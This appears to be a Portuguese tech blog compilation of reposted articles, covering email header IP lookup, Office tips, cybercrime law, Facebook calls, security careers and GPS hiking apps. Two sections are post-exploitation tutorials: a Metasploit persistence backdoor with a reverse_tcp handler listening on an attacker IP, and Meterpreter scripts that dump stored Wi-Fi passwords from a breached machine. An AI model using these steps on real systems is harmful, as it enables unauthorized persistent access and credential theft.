Como verificar o IP do remetente de um e-mail

Nesse tutorial,vou  mostrar como detectar o endereço IP do remetente.

O e-mail endereço IP do remetente é depender de qual provedor de e-mail que você usa. Como sabemos, há muitos provedor de email que fornecem conta de e-mail gratuito, mas por agora só usamos Gmail, Yahoo e Windows Live Hotmail. Com a lógica como verificar o endereço IP do remetente de e-mail que eu espero que você também pode fazer o mesmo com outro provedor de e-mail.

 

Requirement:

1. Internet connection :-)

Step by Step how to Check Email Sender IP Address:

1. First step I will try to send an email from Yahoo account to Gmail account.

How to Check Email Sender IP Address

2. In Gmail you can view the email sender IP address by show the original email in the menu.

How to Check Email Sender IP Address

3. When you click the link it will show some text page that displaying the details of how the message sent from Yahoo until the email arrive in your inbox. Actually the logic is the same when you sending a packet through ups or fedex, you can track the path of your packet where they made a checkpoint(but not as detail as this two logistics service).

How to Check Email Sender IP Address

The text “Received: from” will show you the email sender IP address (see the red box).

From this three steps, we know that if the sender use Yahoo, we can know the sender original IP address.

4. Now the next I will try to send email fro Gmail to Yahoo. Here is the screenshot.

How to Check Email Sender IP Address

5.To check the email sender IP address, you can click the actions and choose view full header.

How to Check Email Sender IP Address

6. Gmail will use the X-Originating-IP to show the sender IP address, but for the privacy they mask and change the Original email sender IP address with Google ip address.

How to Check Email Sender IP Address

If you see the email sender IP address in the red box above, it was Google IP address.

7. Now the last one is testing using Windows Live Hotmail. I try to send it both to Gmail and yahoo. Here is the result in Gmail.

How to Check Email Sender IP Address

Last year Windows Live Hotmail still have the X-Originating-IP, but start in January 2013 they said that they started to protect their users by disable the X-Originating-IP and new variable show up there as X-EIP. This X-EIP is always change dynamically even you send the same email from the same ip address, so maybe it’s a little hard enough to break it :-)

8. Update (the real case)

When I just want to finish this tutorial, then suddenly one email come to my inbox, thanks to that guy helped me to finish this tutorial :-P

How to Check Email Sender IP Address

Rea is one of my friend in Indonesia, I believe she will not sending me this kind of link :-)

Since the sender was using yahoo account, so it is possible for us to detect the original IP address where they come from.

How to Check Email Sender IP Address

9. Now after knowing the email sender IP address 79.129.249.124, let’s find out more about this IP address by whois-ing here using my tools, or you can visit whatismyipaddress.com to check about that email sender IP address. Here is the result:

How to Check Email Sender IP Address

Conclusion:

1. From the three free email provider above, we know that the format of email header is depend on which provider we use to send that email.

2. If you send email from Gmail and Windows Live Hotmail they will hide the email sender IP address.

3. If you send email from Yahoo the recipient of your email can know your ip address.

hope it useful :-)

FONTE:Vishnuvalentino

 

Ajustar transparência de uma imagem no Office

Inserir Figura como AutoForma

Se quiser controlar o grau de transparência de uma imagem, siga os passos abaixo.

Vá no menu Inserir e clique em Formas e selecione Retângulo:

Desenhe um retâgulo no corpo do Documento do tamanho aproximado da figura que você deseja inserir:

Selecione a AutoForma, clique no menu Ferramentas de Desenho e selecione Imagem…:

Na janela que aparecer, selecione a figura desejada e clique em Inserir:

A imagem aparecerá no corpo do Documento:

Para remover as bordas azuis, selecione a imagem e vá em Ferramentas de Desenho, Contorno da Forma e selecione Sem Contorno:

Com a imagem selecionada, clique com o botão direito e selecione Formatar Forma…:

Uma janela aparecerá. Vé em Preenchimento, ajuste o nível de Transparência desejado e, em seguida, clique em Fechar:

Observe agora que a figura apresenta transparência:

Para que o texto sobreponha a imagem, com a figura selecionada, clique em Ferramentas de Imagem e selecione Atrás do texto:

Pronto, agora você tem uma imagem que foi criada através de uma AutoForma transparente:

 

Fonte:AmbienteOffice

Mantendo acesso no host comprometido

Galera, tutorial está parte dele em inglês.

Algumas pessoas e ACERCA estudante pedindo o que devemos fazer depois de explorar com sucesso comprometer ou vítima?

Alguns explorar Tal como CVE-2010-3962 quando a vítima Executado pode fazer computador trava. Quando algum usuário de computador trava optar por reiniciar o computador e ele vai fazer o exploit Torna-se ineficaz anterior.

O que vamos fazer aqui é Mantendo o acesso, a deixar-se uma maneira mais fácil de volta para o sistema posteriormente. Ao utilizar este método, se o serviço é para baixo ou você explorados atualizado, você ainda pode ganhar acesso ao sistema para uso futuro.

O Serviço Meterpreter Metasploit persistente é o que vamos usar neste tutorial, mas não há aviso Quando você usa esse Meterpreter persistente como mostrado neste tutorial requer nenhuma autenticação. Isto significa que ganha acesso a qualquer um que possa acessar a porta de sua porta de trás! Esta não é uma coisa boa se você está conduzindo um teste de penetração, este poderia ser como um risco significativo.

Requirement :

1. Backtrack 5 (or other Linux OS)

2. Metasploit Framework 3 (Included in Backtrack 5)

Step By Step :

1. You need to set your payload of your exploit to meterpreter to do this method.

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

2. run persistence -h to view help list

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

3. We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try toconnect back to our listener every 5 seconds at IP address 192.168.8.89 on port 8080.

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Notice that the script output gives you the command to “remove” the persistent listener when you are done with it. Be sure to make note of it so you don’t leave an unauthenticated backdoor on the system.

Explanation :

-U : start the backdoor when user log in to system

-i : load backdoor every 5 second

-p : will running on port 8080

-r : connect back to 192.168.8.90 (specified ip address)

4. To make sure that it works, try reboot the remote system and set up our payload handler.

msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.90
LHOST => 192.168.8.90
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.8.90:8080
[*] Starting the payload handler...

5. When the remote user restart the system and re-login to the system, there should be like this(we should wait until the backdoor executed by remote system) :

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Let we see what happen to remote user :

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

There’s established connection between attacker and remote host.

Hope it’s useful :-)

Fonte:VishnuValentino

Wireless Scripts para Meterpreter

Esses scripts fornecer funcionalidade relacionada com o tema sem fio ou redes sem fio. O objectivo destes é o de extrair o máximo de informação que pode existir perfis sem fios armazenado na máquina violados. No Windows 7 ou Vista você obter a senha para redes WPA, enquanto o Windows XP é obtido PBKDF2 chave derivada.

O script de post/windows/wlan/wlan_bss_list fornece informações sobre as redes sem fio que tenha violado a máquina configurada. O script de pós / windows / WLAN / wlan_current_connection rede WiFi mostra que a máquina está ligada comprometida, se ele estiver conectado a um. O post script / windows / wlan / wlan_disconnect tentar desligar o aparelho violado a conexão sem fio. E, finalmente, o post script / windows / wlan / wlan_profile recupera informações em formato XML, referindo-se a redes sem fio configurados na máquina violada, incluindo informações como a senha da rede Wi-Fi.

Uma vez que você tem uma sessão Meterpreter, a primeira ação que ocorre é fazer uma lista de redes sem fio que o aparelho armazenar, este fato significa que, geralmente, em algum momento violou a máquina está ligada a essas redes .

 

Com o script de post/windows /wlan /wlan_profile pode obter um despejo de um arquivo em formato XML com os detalhes de redes sem fio, incluindo senhas esta informação para se conectar a redes sem fio. Na foto você pode ver uma parte do depósito, a parte em que informações sensíveis, como senha e nome da rede.

 

Finalmente, você também pode realizar esta operação através da linha de comando da máquina violados. Para abrir uma linha de comando comando é executado Meterpreter shell e digite netsh wlan mostra perfil para recuperar informações de redes sem fio configurados na máquina violados.

Fonte:FluProject

 

Cafeteira em Forma de Motor V12

 

Cafeteira-Expresso-Veloce-V12

A incrível máquina de café Expresso Veloce vai deixar suas visitas boquiabertas!

A cafeteira Expresso Veloce V12 tem a forma de um motor de corrida V12 feito com materiais nobres como titânio, magnésio e alumínio. A cafeteira faz um delicioso café estilo italiano, é feita à mão e tem edição limitada em 500 unidades.

A cafeteira também está disponível na versão motor V10 e o preço só sob consulta, mas já dá para prever que é bem alto.

Fonte:DigitalDrops

WDivulge, Descubrindo pastas e arquivos ocultos

As auditorias web, é imprescindível a utilização de uma ferramenta como “enumeração. Isto ajuda-nos a encontrar painéis de administração, diretório com informações confidenciais. E até mesmo diretórios com permissões incorretas que permitem que lista arquivos.

Faça o download da ferramenta e ver listas de arquivos que vai procurar

darkmac:lists marc$ more files.txt
“pictures”[###]\”.jpg”
“DCP_”[####]\”.jpg”
“IMG_”[####]\”.jpg”
“”[##]\”.jpg”
“dsc”[#####]\”.jpg”
“dscn”[####]\”.jpg”
“mvc-”[###]\”.jpg”
“mvc”[#####]\”.jpg”
“P101″[####]\”.jpg”
“IMG_”[###]\”.jpg”
“IMAG”[####]\”.jpg”
“_MG_”[####]\”.jpg”
“dscf”[####]\”.jpg”
“pdrm”[####]\”.jpg”
“IM”[######]\”.jpg”
“EX”[######]\”.jpg”
“pict”[####]\”.jpg”
“P”[#######]\”.JPG”
“IMGP”[####]\”.JPG”
“PANA”[####]\”.JPG”
“Image(“[##]\”).JPG”
“DSCI”[####]\”.JPG”
“PICT”[#####]\”.jpg”
“HPIM”[####]\”.jpg”
“DSCN”[####]\”.jpg”
“DSC”[#####]\”.jpg”
“IMG_”[#####]\”.jpg”
darkmac:lists marc$

Podemos modificar esta lista a adicionar as nossas.

Lançamos a ferramenta contra um servidor web em um ambiente controlado.

O pedido irá tornar a ferramenta é como se segue:

“GET /pictures298.jpg HTTP/1.1″

Se vemos que os pedidos estão surgindo realmente, podemos ver os logs do servidor

Como você pode ver a ferramenta está a tentar combinações diferentes, se, por exemplo, deseja bloquear este difusor, poderíamos criar algo como:

#Block scanners
 <Directory / >
     BrowserMatch ^wdivulge deny_host
     Deny from env=deny_host
  </Directory>

Temos uma ferramenta mais para o nosso arsenal!

Fonte:Flu

Lei dos Crimes Cibernéticos entrará em vigor em 02/04/2013

Amanhã (dia 02/04/2013) entrarão em vigor as leis 12.735/2012 e 12.737/2012. Abaixo listo alguns artigos interessantes sobre o impacto das novas leis para os profissionais de segurança brasileiros (especialmente os que fazem pentest e pesquisa de vulnerabilidades) e demais atores que agora passam a estar sujeitos às penas previstas nas novas legislações, que determinam para o crime de invasão de dispositivos – por exemplo – até dois anos de prisão.

Ainda sobre o tema, o site InternetLegal possui uma listagem exaustiva das “Principais Leis Federais sobre Informática, Telemática, Internet” – http://www.internetlegal.com.br/biblioteca/legislacao/\

Fonte:SandroSuffert

Como fazer ligações gratuitas pelo Facebook no Brasil

O recurso de ligações via Wi-Fi ou 3G/4G através do Facebook usando o app Messengerpara iOS e Android já estava disponível desde janeiro em alguns países. Agora, está disponível no Brasil. Já apareceu aí no seu?

Não é preciso atualizar o app, basta ter a última versão (disponível na App Store e no Google Play). Para ver se o recurso está habilitado, clique em algum contato e depois no “i” do canto superior direito.

Como ligar no Facebook.

Se sim, aparecerá a opção de realizar a chamada, “Ligação gratuita”. Apenas clique e espere o contato atender. Há relatos, ainda não confirmados, de que a opção só surja para quem cadastro o número do celular no perfil da rede social — quem não está apto ganha um botão cinza/inativo. Outra exigência é que o botão só aparece funcional se as duas pessoas tiverem a última versão do app.

Note que existe um monte de “se”, e para piorar o app não tem um filtro que facilite a descoberta de quem está habilitado para conversar. O jeito é clicar de contato em contato e ver se a opção aparece ali. Nada conveniente, mas um esforço válido na hora de economizar com voz, ou falar com alguém que você não tenha o número.

Ultrapassadas essas barreiras, porém, a qualidade da ligação é boa. Nos rápidos testes que fizemos aqui, notamos um chiado no início, mas algo bem rápido e que, em seguida, some e dá lugar a vozes bastante claras e fáceis de compreender. Nos testes com o 3G da Vivo em Niterói (valeu, Felipe!) a qualidade se manteve, então nesse ponto (qualidade de voz) não há muito do que reclamar.

Eu, porém, pareço não estar dando muita sorte. Não sei se é alguma zica com minha conexão ou com o smartphone, mas 1) não consigo fazer chamadas, só receber; e 2) elas caem após ~30 segundos. Ou talvez seja algum problema com o Facebook. Testei com três pessoas e, com todas elas os mesmos sintomas se manifestaram. Pedi ao Felipe e outros amigos que verificassem se esse problema da queda após 30s se repetia, e com eles não aconteceu. O que foi que eu te fiz pra merecer isso, Zuck?

Fonte:Gizmodo

Carreira: Cresce a demanda por profissionais de segurança qualificados

Materia da IDGNOW

A demanda por especialistas de segurança da informação nos Estados Unidos e em outros mercados como o Brasil está superando a oferta disponível. No Brasil a carência por esses talentos é um reflexo da falta de profissionais qualificados para atuar em diversas áreas em TI.

Relatório divulgado pela Burning Glass Technologies, empresa americana que desenvolve soluções para comparar as ofertas de profissionais com oportunidades no mercado de trabalho, mostra que a demanda por especialistas em segurança cibernética cresceu 3,5 vezes mais que a procura por talentos de TI em geral e 12 vezes mais do que todos as outras vagas de emprego.

A conclusão da Burning Glass é baseada em um estudo que avaliou ofertas de empregos para os profissionais de segurança cibernética em empresas de diversos segmentos da economia e agências do governo dos Estados Unidos nos últimos cinco anos.

De acordo com a empresa, em 2012 havia mais de 67,4 mil vagas para profissionais de segurança cibernética distribuídas por companhias de diversos segmentos da economia, incluindo empresas de defesa, setor financeiro, saúde, varejo e serviços profissionais. Esse número é 73% maior do que o número das posições ofertados em 2007, segundo a pesquisa da Burning Glass.

Em comparação, o número de ofertas para profissionais de TI de todas as áreas cresceu cerca de 20% entre 2007 e 2012, enquanto as vagas de empregos em geral aumentaram apenas 6% durante o período.

Os dois talentos de segurança mais cobiçados pelos empregadores eram engenheiros de segurança da informação e analistas de segurança.

Uma em cada três vagas ofertadas para profissionais nessa área era para os engenheiros de segurança da informação. Quase 25% das oportunidades foram para analistas de segurança.

Matt Sigelman, CEO Burning Glass Technologies, avalia que a crescente demanda por profissionais de segurança da informação indica que as empresas e agências governamentais estão investindo mais dinheiro e esforço para proteger seus dados contra ataques.

Entretanto, o executivo afirma que a maior preocupação é saber se há oferta de talentos o suficiente para atender a demanda das empresas em razão do aumento de exigências para contratação desse tipo de mão de obra.

Exigência de certificação

Por exemplo, nos últimos dois anos, a maior parte das vagas exige que os candidatos tenham o Certified Information Systems Security Professional (CISSP), que saltou de 19 mil para mais de 29 mil credenciados.

Outra indicação da dificuldade crescente de empregadores norte-americanos de encontrar profissionais de segurança da informação qualificados são os anúncios de emprego. Eles geralmente levam 35% a mais do tempo que normalmente levariam para achar talentos de TI na hora de encontrar especialistas de segurança.

Julie Peeler, diretora da Fundação ISC2, que desenvolve programa CISSP, afirma que não há dúvida de que a crescente demanda está superando a oferta de especialistas em segurança.

Para o próximo ano, a executiva estima que haverá a necessidade de mais 330 mil profissionais de segurança em todo o mundo. O problema é que a quantidade de jovens talentos que estão saiado anualmente da faculdade não atende a demanda do mercado, informa Julie.

Uma pesquisa recente da Fundação ISC2 com cerca de 12 mil profissionais de segurança da informação em todo o mundo constatou que a escassez de talentos nessa área tem gerado impacto dramático sobre a capacidade das organizações de defesa contra ataque ou de se recuperar rapidamente de invasões cibernéticas.

“[A escassez] está causando uma pressão sobre a força de trabalho existente”, diz Julie. “Eles estão tendo que trabalhar mais e mais horas.”

A crescente escassez fez com que os salários para os profissionais de segurança da informação aumentassem em comparação com muitos outros cargos de TI.

De acordo com a Burning Glass, a média de salário para profissionais de segurança da informação em 2012 era 100,7 mil dólares contra 89,2 mil dólares por ano para outros talentos de TI.

Especialistas com certificações de segurança ganham um salário modestamente mais elevado, de acordo com estudo da Burning Glass. Em muitos casos, as empresas exigem essas credenciais como uma maneira de filtrar os candidatos com conhecimento comprovado dos que não são experientes.

“A demanda é alta, mas não há oportunidade para todos”, informa Roger Cressey, vice-presidente sênior da Booz Allen Hamilton.

Embora seja verdade que os empregadores estão procurando mais profissionais de segurança da informação, eles só querem talentos com muita experiência em áreas como a segurança de rede, governança, políticas e procedimentos. “Você tem que ter as habilidades exigidas” afirma o consultor.

Cressey observou que as universidades dos Estados Unidos, hoje, não estão treinando pessoas o suficiente para lidar com a demanda explosiva por especialistas em segurança de TI. A realidade do Brasil não é muito diferente.

Apps para GPS e trilhas – iPhone IOS e Android

Algumas pessoas tem me perguntado sobre aplicativos para smartphone/tablet que sejam capazes de marcar e exportar o tracklog das trilhas que eles venham a fazer por aí. Então eu resolvi buscar alguns programas que possuem essas funções de fazer o track das trilhas, bom como outras funções – tanto no Android quanto no IOS. Uma coisa que é importante citar é que nem sempre os telefones conseguem receber bem o sinal do GPS quando estão sob vegetação mais fechada ou mesmo em dias de tempo ruim, o que pode inutilizar o app dependendo do local onde você vai caminhar.

Separei alguns apps que encontrei em pesquisas no Google e nas app stores. Alguns eu conheço, como oMaverick, GPS Essentials e o My Topo Maps para Android – inclusive já usei alguns deles. Não sei como são os apps para IOS (iPhone), mas escolhi os que tinham boas funções e avaliações positivas.

O destaque, na verdade “os destaques”, para iPhone são os três apps – todos com funções boas. Já para Android os que merecem destaque são o GPS Essentials, o Maverick e o My Topo Maps. Outra opção interessante para quem já usa o site é o app do “Wikiloc”, também para Android.

1. Apps para tracklog/GPS iPhone

Como eu citei antes os apps para o IOS não foram testados, me baseei apenas na avaliação e funções úteis deles.

1.1 – GPS KIT

O app trabalha com arquivos KML, KMZ e GPX o que permite uma integração com o Google Earth e o TrackMaker, bem como permite compartilhamentos no Facebook e Twitter. Tem bússola digital, permite segir de um waypoint para outro usando a bússola, informações sobre velocidade média, ritmo e distância, entre outras informações. Segundo o desenvolvedor o GPS Kit usa a máxima precisão do GPS para um track mais eficiente, mesmo em locais onde o sinal da operadora de telefonia não existe.

app para trilha no iPhone

Custo: U$ 9.99
Mais informações e download: https://itunes.apple.com/us/app/gps-kit/id287909017?mt=8

1.2 – Maps 3D

O Maps 3D, como o nome já diz, tem o diferencial de mostrar a rota sobre uma imagem em 3D – o que do ponto de vista da navegação e do planejamento da trip pode ser muito interessante! O app permite descarregar os mapas através de wi-fi ou 3G e usá-los posteriormente sem a presença de uma conexão de dados, o que é o normal em ambiente outdoor. Ele permite compartilhar os tracks via Twitter e Facebook, marcar waypoints e pontos de interesse (POIs), mostra informações sobre distância, velocidades, altitude e o quanto falta percorrer, entre outras funções!

mapas 3D de trilhas pro iPhone

Custo: U$ 1.99
Mais informações e download: https://itunes.apple.com/us/app/Maps-3d/id391304000?mt=8

1.3 – Trails

Exporta e importa GPX, exibe informações sobre distância, altitude e velocidade, faz a gravação do track sem precisar de internet (porém para exibir o mapa é necessário uma conexão – ponto ruim do app), exibe as distâncias em kilômetros ou milhas, permite editar waypoints diretamente no mapa, etc. O ruim dele é esta questão de não trabalhar com mapas offline, infelizmente!

app Trails

Custo: U$ 3.99
Mais informações e download: https://itunes.apple.com/app/trails-gps-tracker/id289190494?mt=8

2. Apps para tracklog/GPS Android

2.1 – My Topo Maps

Esse foi um app que eu gostei muito! Principalmente por ajudar no planejamento de trilhas mostrando o mapa topográfico do local e por marcar com latitude e longitude um ponto qualquer no mapa. A versão PRO (paga) permite armazenar mapas para consulta offline. Um diferencial interessante é que ele permite sobrepor o mapa topográfico com um com imagens de satélite, permitindo uma melhor “leitura” do terreno, como mostra a imagem abaixo:

Trimble Outdoors app

Note que existe um cursor em forma de cruz que pode ser posicionado para determinar a latitude/longitude de um ponto no mapa

É possível marcar e identificar waypoints no mapa, bem como localizar um ponto através da sua latitude/longitude, bem como marcar dois pontos e determinar a distância entre eles (em linha reta). O mesmo desenvolvedor tem outro app chamado “Trimble Outdoors Navigator“, igualmente gratuito e que permite a gravação das rotas usando o GPS do aparelho celular/tablet.

Custo: gratuito
Mais informações e download:
https://play.google.com/store/apps/details?id=com.trimble.outdoors.mapviewer&feature=search_result

2.2 – Maverick (versão gratuita)

O Maverick é um dos melhores aplicativos para mapas e GPS do sistema Android, pelo menos na minha opinião, ele permite a gravação de tracklogs em GPX, compartilhamento da posição atual ou planejada nas redes sociais, informa uma série de dados (altitude, dados de velocidade, latitude/longitude e bússola), possui uma série de mapas diferentes com um destaque para o mapa de transportes urbanos que pode ajudar os viajantes a se acharem e o mapa para ciclistas que mostra as lojas de bike por perto. É um app bem completo realmente, vale um teste!

Mapa de transportes Maverick

Mapa de transportes públicos do Maverick, marcando algumas linhas de ônibus da orla carioca e as estações de metrô

Maverick  mapa para ciclistas

Detalhe interessante um mapa para ciclistas que mostra as ciclovias e lojas de bike ao redor (ícones amarelos).

Custo: gratuito
Mais informações e download:
https://play.google.com/store/apps/details?id=com.codesector.maverick.lite

2.3 – Wikiloc

Útil para quem já usa o site do Wikiloc.com, este app de mesmo nome permite acompanhar sua trip no mapa, incluir fotos e gravar o tracklog da trip no seu aparelho, bem como compartilhar o material no Facebook ou no Wikiloc.com. Vale o teste para quem curte o portal, eu não usei.

Wikiloc

Custo: gratuito
Mais informações e download:
https://play.google.com/store/apps/details?id=com.wikiloc.wikilocandroid&feature=search_result

2.4 – GPS Essentials

Outro canivete suíço do Android quando o assunto é GPS, tracklog e afins. Disponibiliza uma série de informações úteis – latitude, longitude, velocidades, número de satélites, horários do nascer e pôr do sol, fase da lua e muito mais! Permite marcar waypoints, gravar tracklogs, ver gráficos, adicionar fotos… A interface é bem simples, mas funcional – permite exportar os dados para KML ou GPX e inclusive fazer o upload para o Dropbox. Aceita a importação de arquivos em KML. Vale muito um teste.

https://www.youtube.com/watch?feature=player_embedded&v=ExOLvSzBJ70

2.5 – Minhas Trilhas

Este o pessoal do trekking Brasil n comentou, é uma dica minha mesmo! Este eu uso, e posso garantir: Muito bom! Fácil de mexer.

O Google liberou uma nova versão de seu aplicativo Minhas Trilhas  (também conhecido como “Os Meus Percursos”) para Android. Com uma interface totalmente renovada, o app oferece um modo fácil de gravar e compartilhar trajetos via GPS.

“Minhas Trilhas registra o seu caminho, velocidade, distância e altitude, enquanto anda, corre, anda de bicicleta ou faz qualquer outra atividade ao ar livre. Durante a gravação, você pode visualizar os seus dados ao vivo, anotar o trajeto e ouvir anúncios de voz periódicos sobre seu progresso”, explicou o buscador.

Além de contar com suporte a versão 4.0 do Android, o Minhas Trilhas também apresenta integração com o Google+, Facebook e Twitter. Você ainda pode adicionar seus dados no Google Maps e Tabela (Beta) do Google Drive e Docs.

Caso você tenha interesse em registrar mais dados, por exemplo, frequência cardíaca, o aplicativo traz suporte a sensores biométricos de terceiros, como o Zephyr HXM e Polar Wearlink, ambos com tecnologia Bluetooth.

my tracks e1342380505607 Google relança Minhas Trilhas para Android

Leia mais em: http://googlediscovery.com/2012/07/15/google-relanca-minhas-trilhas-para-android/

Leia mais em: http://googlediscovery.com/2012/07/15/google-relanca-minhas-trilhas-para-android/

Fonte:TrekkingBrasil